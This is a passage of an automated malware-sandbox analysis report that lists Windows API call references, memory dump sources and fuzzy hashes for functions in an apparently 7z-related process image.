                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934437811-0
                                                                                                                                        • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                        • Instruction ID: 1cfedd1740d944c9a02bcb4ae183d4ed86e1cc80763a944736f9e42d8e318c11
                                                                                                                                        • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                        • Instruction Fuzzy Hash: 781181637106C08BCB34EF25E89439AA750EB427A4F584215AFAD077AADF68C55ACB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                        • Instruction ID: 32bcb54c2280218e65d932ab4eb535d89e917fea086db893fc240db1af8d738b
                                                                                                                                        • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                        • Instruction Fuzzy Hash: ED01DF6223454081CE24EF12F46516F9321EFC57E4F4412217EAD576A6CF24C5EECF00
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 002489D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 002489EA
                                                                                                                                        • CreateFileW.KERNELBASE ref: 00248D51
                                                                                                                                        • CreateFileW.KERNEL32 ref: 00248DA4
                                                                                                                                        • free.MSVCRT ref: 00248DB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile$CloseHandlefree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 210839660-0
                                                                                                                                        • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                        • Instruction ID: ed1b714705b221bad8b194a412fbe566892e57afae6c3e22d0d7a95a364a5f6f
                                                                                                                                        • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                        • Instruction Fuzzy Hash: 6821CF335256818AC7649F25A84165E6760F3967F4F540321EFB903BE4CF38C8A68B00
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00243274: memmove.MSVCRT ref: 002432AC
                                                                                                                                        • fputs.MSVCRT ref: 00282D41
                                                                                                                                        • fputs.MSVCRT ref: 00282DCF
                                                                                                                                        • free.MSVCRT ref: 00282DFF
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$fputcfreememmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1158454270-0
                                                                                                                                        • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                        • Instruction ID: 14a25f9fb72a9e8ed3e58820733156f275dce14520f387e3e0952a4015317466
                                                                                                                                        • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                        • Instruction Fuzzy Hash: DD215162720A02C1CF24EF26E85125E6770EB95BE4F849221FE5F477A9DE2CC559CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3796167841-0
                                                                                                                                        • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                        • Instruction ID: ead5831b4c18e84caaa640baa35e64cfc94f7a47841ea248ad226c7ebe1a4f47
                                                                                                                                        • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                        • Instruction Fuzzy Hash: 0D51B323331B56A7DB6DCE2AD5547A923A0FB08794F241126DF0A87F50DB39D8B6C700
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputc
                                                                                                                                        • String ID: Kernel
                                                                                                                                        • API String ID: 1992160199-1736990243
                                                                                                                                        • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                        • Instruction ID: 409fe051c8d666f66c18fed5f87cb4188626fad978d73acee990e1c378718b7c
                                                                                                                                        • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                        • Instruction Fuzzy Hash: C8C09B5575174882EF1417B7E8453251311D75DF91F185070CE1D07350DD1CD4D68711
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00273E2A
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                        • String ID: h&
                                                                                                                                        • API String ID: 2114622545-3089496992
                                                                                                                                        • Opcode ID: 53aea2c750e75119cad48fb564047798f36c27bd60b9748b317531b4fdd21722
                                                                                                                                        • Instruction ID: b69e486df53ac4325d4e5336f20e12378f5bee039b8cab7c14286507e8012705
                                                                                                                                        • Opcode Fuzzy Hash: 53aea2c750e75119cad48fb564047798f36c27bd60b9748b317531b4fdd21722
                                                                                                                                        • Instruction Fuzzy Hash: FC318B33221B4286DB19DF29D584369B3A1FB88FE0F588524DB5E07754DF38C965C700
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0028B20D
                                                                                                                                        • fputs.MSVCRT ref: 0028B232
                                                                                                                                          • Part of subcall function 00242B04: _CxxThrowException.MSVCRT ref: 00242B2D
                                                                                                                                          • Part of subcall function 00242B04: free.MSVCRT ref: 00242B44
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrowfputsfreememset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3104931167-0
                                                                                                                                        • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                        • Instruction ID: e2fa8189a226ed14abc2782d4cfb5bbf3c66e9fb547b8284b5a9793324f0142f
                                                                                                                                        • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                        • Instruction Fuzzy Hash: 6F01047770168096E706DF6BDA8474E2720F719B84F488022DF0807751CF70D8BAC310
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,00000003,?,00248E1D), ref: 00248A99
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000003,?,00248E1D), ref: 00248AA6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                        • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                        • Instruction ID: 6ea05b47cd465159a50c0e9f6eee4d16464360fb8d7540af5479ddd4178c6237
                                                                                                                                        • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                        • Instruction Fuzzy Hash: 9EF0F666B317D183DF288F6DD84875C2361E759B98FBC5022CB0843B50DFAAC8A2C710
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputcfputsfree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2822829076-0
                                                                                                                                        • Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                        • Instruction ID: 8855a2d89fadd704f333ee107e2126c43d69bbdc3efa274f1ce9697c13b39873
                                                                                                                                        • Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                        • Instruction Fuzzy Hash: DDF0826721194480CA20EF26E94531D5330E789BF8F488320EE6D477E9DF28C99ACB00
                                                                                                                                        APIs
                                                                                                                                        • memmove.MSVCRT ref: 0027404D
                                                                                                                                        • memmove.MSVCRT ref: 00274087
                                                                                                                                          • Part of subcall function 00243404: free.MSVCRT ref: 00243431
                                                                                                                                          • Part of subcall function 00243404: memmove.MSVCRT ref: 0024344C
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1415420288-0
                                                                                                                                        • Opcode ID: 922c4c0b2366e04d7b7bc81b27483721c255a8e103a606f9716e352ae471c5b3
                                                                                                                                        • Instruction ID: 07d77e5c2a35f036d05017f0d3dde86494b290497a30ac29456a59e146bd3052
                                                                                                                                        • Opcode Fuzzy Hash: 922c4c0b2366e04d7b7bc81b27483721c255a8e103a606f9716e352ae471c5b3
                                                                                                                                        • Instruction Fuzzy Hash: E23160672296C596CA35FF14E5946EEB720F791340F808422C79D43B6AEF38D6A9CF00
                                                                                                                                        APIs
                                                                                                                                        • memmove.MSVCRT ref: 00274065
                                                                                                                                        • memmove.MSVCRT ref: 00274087
                                                                                                                                          • Part of subcall function 00243404: free.MSVCRT ref: 00243431
                                                                                                                                          • Part of subcall function 00243404: memmove.MSVCRT ref: 0024344C
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1415420288-0
                                                                                                                                        • Opcode ID: 19adca41d0c10e802e7e9a033628de9dc28b031a0220b8790a91693c387ff0bb
                                                                                                                                        • Instruction ID: 42a524e1e0c093fa8be03a4aaaf60577834f6f357bea5513fe775e53ae56c7dd
                                                                                                                                        • Opcode Fuzzy Hash: 19adca41d0c10e802e7e9a033628de9dc28b031a0220b8790a91693c387ff0bb
                                                                                                                                        • Instruction Fuzzy Hash: 9411C3633256C692CE31FB51E4952AEA310E791390F908426CB9D47A95DB38C6E9CF00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                        • Instruction ID: 897e566685d03b29c3bcb963851b8f8522b692ce1e60f3e2c36c2b1af764dbfb
                                                                                                                                        • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                        • Instruction Fuzzy Hash: DFF08623312B91C6DA24AE66E84016D6754AB46FB1F188320EF7D17791CF34C8A7C300
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        • memmove.MSVCRT ref: 0028C815
                                                                                                                                        • free.MSVCRT ref: 0028C81D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrowfreemallocmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1097815484-0
                                                                                                                                        • Opcode ID: 581426f19328811152166685f6cf1937972c62f6cd3183fa7d76b20dd62ec97f
                                                                                                                                        • Instruction ID: c758b45c7ffc32df8115593eb3f9d20167398607774f974ab0ac1765edde2ef1
                                                                                                                                        • Opcode Fuzzy Hash: 581426f19328811152166685f6cf1937972c62f6cd3183fa7d76b20dd62ec97f
                                                                                                                                        • Instruction Fuzzy Hash: CC018677712588CBCB18DF26D45156CB764E788F99B08C129DF094B398CA34DC9ACB50
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00280A42
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00280A73
                                                                                                                                          • Part of subcall function 0028B480: GetTickCount.KERNEL32 ref: 0028B49E
                                                                                                                                          • Part of subcall function 0028B480: strcmp.MSVCRT ref: 0028B4E3
                                                                                                                                          • Part of subcall function 0028B480: wcscmp.MSVCRT ref: 0028B502
                                                                                                                                          • Part of subcall function 0028B480: strcmp.MSVCRT ref: 0028B568
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3267814326-0
                                                                                                                                        • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                        • Instruction ID: c4732a1acd37833b9cae17f6c41358a1c7261eb8c3a13d22bf901dd2f545de1c
                                                                                                                                        • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                        • Instruction Fuzzy Hash: 48F05E66360A9082E7109F24E9887996360E745BB5F244335DE7D477E9CF3C859EC314
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                        • Instruction ID: 5664cba69e2e5ccfb5219127c354d58b58833d1c90d94ec5abc9614e0e32b00e
                                                                                                                                        • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                        • Instruction Fuzzy Hash: 2BE03762264940D1CA24EB22E45105A6760EBC57F4B842311B6BF576F9DE28C69ACF00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrowmalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2436765578-0
                                                                                                                                        • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                        • Instruction ID: e7c8640c264fe5f4c8a07dc22596adaf1c1f3501b886d8dcc2ba44256e22c154
                                                                                                                                        • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                        • Instruction Fuzzy Hash: E7D01254B276C5D1DF48AB5598853145720A799780FD05495F25F01725DE5CC1DFCB01
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                        • Instruction ID: 8eaa6bed28cd27ffe7fe6adf04f66cee2b08c70a777e55bfb37d3b01a13d6f6a
                                                                                                                                        • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                        • Instruction Fuzzy Hash: DC515B72264AC1D5CB22CF35C4402ED7B61F38AF89FA94176CE9A0A798DF74C899C714
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
